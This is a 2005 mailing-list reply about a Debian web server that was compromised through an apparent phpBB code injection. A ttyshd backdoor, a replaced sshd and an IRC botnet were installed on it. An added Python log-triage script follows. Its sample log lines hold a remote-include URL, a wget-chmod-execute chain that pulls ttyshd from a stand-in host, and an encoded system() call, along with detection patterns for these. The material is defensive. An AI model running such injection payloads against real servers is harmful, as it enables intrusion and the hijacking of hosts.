Re: backdoor named tvic / Kayten / ttyshd download in apache logfile

From: Henning (Henning.Lieder_at_gmail.com)
Date: 04/26/05

  • Next message: Chris Kronberg: "Re: backdoor named tvic / Kayten / ttyshd download in apache logfile"
    Date: 26 Apr 2005 01:51:18 -0700
    
    

    > Downloaded both of them for analysis.
    Thank you.
    > If this is the case your system might be in real trouble.
    Yes it is/was. The ttyshd opened a telnet account for them.
    They managed to gain root access! But I wonder how. It is a Debian
    testing system, apt-get upgraded only 2 days before the attack. And their
    telnet shell ran as user www-data.
    They replaced the ssh daemon and the log/network daemons. With the ssh
    daemon they could read the root pw from me. They installed an
    IRC-BotNet client to control the server and another qmail for
    spamming.
    They didn't touch my IP accounting, so I know that 2-3 GB of traffic
    was produced.
    They did no more damage because they wanted to have this PC in their
    botnet?

    Luckily I made a backup 2 days before the attack. I reinstalled the
    system.
    (I couldn't trust any file on the server anymore.)

    > Do you have any cgi script running on your webserver?
    Yes, some CGI and PHP. I think they used a 'code injection' on an old
    phpBB install of a customer.

    I secured the system now. PHP in safe mode without
    "exec/system/passthru" calls.
    Programs like wget/ftp/chmod ... are only accessible to members of
    "users".
    No direct root ssh. Most cgi-bin ScriptAliases are disabled until I
    know all scripts running.

    They tried to log in via ssh a few times. But it has stopped since
    yesterday.

    Cheers

    Henning
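
The thread subject says the ttyshd download showed up in the Apache log, and the post above suspects a code injection through a web script. The script below is an added example, not code from the original post or from any of the tools it names: it triages Apache "combined" access-log lines for requests that pass a remote URL or a fetch-and-run command chain in a parameter, which is how a www-data shell typically pulls a dropper onto the box. The sample log lines, addresses, paths and parameter names are constructed for the example, and the indicator patterns are heuristics chosen here, not a published signature set.

```python
import re
import sys
import urllib.parse
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample lines in Apache "combined" log format (not from the original
# post; hosts are RFC 5737 documentation addresses, paths and parameters are made up).
# Line 4 is a double-URL-encoded payload, a common trick to slip past naive filters.
SAMPLE_LOG = """\
198.51.100.23 - - [24/Apr/2005:02:58:10 +0200] "GET /forum/index.php HTTP/1.1" 200 18432 "-" "Mozilla/5.0"
203.0.113.7 - - [24/Apr/2005:03:12:41 +0200] "GET /forum/viewtopic.php?t=12&page=http://203.0.113.50/cmd.txt? HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
203.0.113.7 - - [24/Apr/2005:03:12:43 +0200] "GET /forum/viewtopic.php?t=12&cmd=cd%20/tmp;wget%20http://203.0.113.50/ttyshd;chmod%20%2Bx%20ttyshd;./ttyshd HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - - [24/Apr/2005:03:12:50 +0200] "GET /forum/viewtopic.php?t=12&cmd=%2570%2565%2572%256c%2520%252d%2565%2520%2527%2573%2579%2573%2574%2565%256d%2528%2522%2575%256e%2561%256d%2565%2522%2529%2527 HTTP/1.1" 200 120 "-" "Mozilla/4.0"
198.51.100.77 - - [24/Apr/2005:04:01:02 +0200] "GET /news.php?id=7&ref=http://www.example.com/ HTTP/1.1" 200 3010 "-" "Mozilla/5.0"
"""

# Apache combined log format: host ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: (?P<proto>HTTP/[\d.]+))?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Heuristic indicators, run over the URL-decoded request target (path + query).
INDICATORS: Dict[str, "re.Pattern[str]"] = {
    "remote_url":  re.compile(r"[?&=][^&]*?\b(?:https?|ftp)://", re.I),      # a URL inside a parameter value
    "rfi_marker":  re.compile(r"=(?:https?|ftp)://[^&\s]*\?(?:&|$)", re.I),   # value is a URL ending in '?' (classic remote-include tell)
    "fetch_tool":  re.compile(r"\b(?:wget|curl|lynx)\b", re.I),               # downloader named in the request
    "php_exec":    re.compile(r"\b(?:system|passthru|exec|shell_exec|popen|eval)\s*\(", re.I),
    "shell_chain": re.compile(r"(?:;|\|\||&&|\|)\s*\S"),                        # command separators in a parameter
    "chmod_tmp":   re.compile(r"\bchmod\b|/tmp/|\bcd\s+/tmp\b", re.I),        # make-executable / staging-in-/tmp
}
# A bare URL in a parameter is common in legitimate traffic (referrer-style params),
# so it alone is reported as low confidence; the others are strong on their own.
HIGH_CONFIDENCE = {"rfi_marker", "fetch_tool", "php_exec", "shell_chain"}


@dataclass
class Finding:
    ip: str
    timestamp: str
    target: str          # request target exactly as logged
    decoded: str         # after bounded URL-decoding
    indicators: List[str]
    severity: str        # "high" or "low"


def decode_target(target: str, max_rounds: int = 3) -> str:
    """URL-decode repeatedly (bounded) so double-encoded payloads are seen in the clear.
    urllib.parse.unquote is used rather than unquote_plus so '+' in shell commands survives."""
    decoded = target
    for _ in range(max_rounds):
        once = urllib.parse.unquote(decoded)
        if once == decoded:
            break
        decoded = once
    return decoded


def severity(indicators: List[str]) -> str:
    return "high" if HIGH_CONFIDENCE & set(indicators) else "low"


def scan(log_text: str) -> List[Finding]:
    """Return one Finding per log line that matches at least one indicator."""
    findings: List[Finding] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; a production tool would count these
        decoded = decode_target(m["target"])
        hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
        if hits:
            findings.append(Finding(m["ip"], m["ts"], m["target"], decoded, hits, severity(hits)))
    return findings


def by_source(findings: List[Finding], only_high: bool = False) -> Dict[str, int]:
    """Count findings per client address, optionally only the high-confidence ones."""
    return dict(Counter(f.ip for f in findings if not only_high or f.severity == "high"))


if __name__ == "__main__":
    # Reads a log from stdin if one is piped in, otherwise runs on the constructed sample.
    text = SAMPLE_LOG if sys.stdin.isatty() else sys.stdin.read()
    results = scan(text)
    for f in results:
        print(f"{f.severity:4} {f.ip:15} {f.timestamp}  {','.join(f.indicators)}\n      {f.decoded}")
    print("per source (high only):", by_source(results, only_high=True))
```

A hit on the fetch-and-run chain tells you which source address and which script to look at first; the script that was reached is the one whose code needs reading, and the decoded command names the staging directory (here /tmp) worth checking on the host before it is rebuilt. Bounded decoding matters in both directions: too few rounds miss double-encoded payloads like line 4, too many start turning innocent percent signs into false positives.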


